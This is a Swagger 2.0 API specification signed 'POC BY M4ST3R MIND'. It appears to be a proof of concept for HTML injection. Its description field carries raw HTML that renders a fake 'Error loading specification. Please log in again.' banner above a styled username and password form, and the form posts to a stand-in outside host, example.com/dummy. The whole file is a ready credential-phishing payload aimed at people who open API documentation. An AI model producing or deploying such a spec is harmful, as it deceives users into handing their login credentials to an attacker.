swagger: '2.0'
info:
  version: 1.0.0
  title: Login Page
  description: '<div class="login-form">
<!-- Error Box -->
<div style="width: 100%; max-width: 400px; margin: 20px auto; padding: 20px; background: #f8d7da; border-radius: 8px; box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);">
  <div style="color: #721c24; text-align:center; font-size:16px;">
    <strong>Error loading specification. Please log in again.</strong>
  </div>
</div>

<!-- Login Form -->
<div class="heading">
  <h1 style="text-align: center; font-size: 24px; color: #333; margin-bottom: 20px;">Login Page</h1>
  <div style="max-width: 400px; margin: auto; padding: 20px; background: white; border-radius: 8px; box-shadow: 0 4px 8px rgba(0,0,0,0.1);">
    <form action="https://example.com/dummy" method="post">
      <label>Username</label>
      <input type="text" name="username" style="width:100%;padding:10px;margin-bottom:10px;border:1px solid #ccc;border-radius:4px;">

      <label>Password</label>
      <input type="password" name="password" style="width:100%;padding:10px;margin-bottom:20px;border:1px solid #ccc;border-radius:4px;">

      <button type="submit" style="width:100%;padding:12px;background:#5cb85c;color:white;font-size:16px;border-radius:4px;border:none;">Login</button>
    </form>
  </div>
</div>

<!-- Footer -->
<div style="text-align:center;margin-top:20px;font-size:12px;color:#888;">
  POC BY M4ST3R MIND
</div>
'
paths:
  /:
    post:
      responses:
        '200':
          description: Login successful
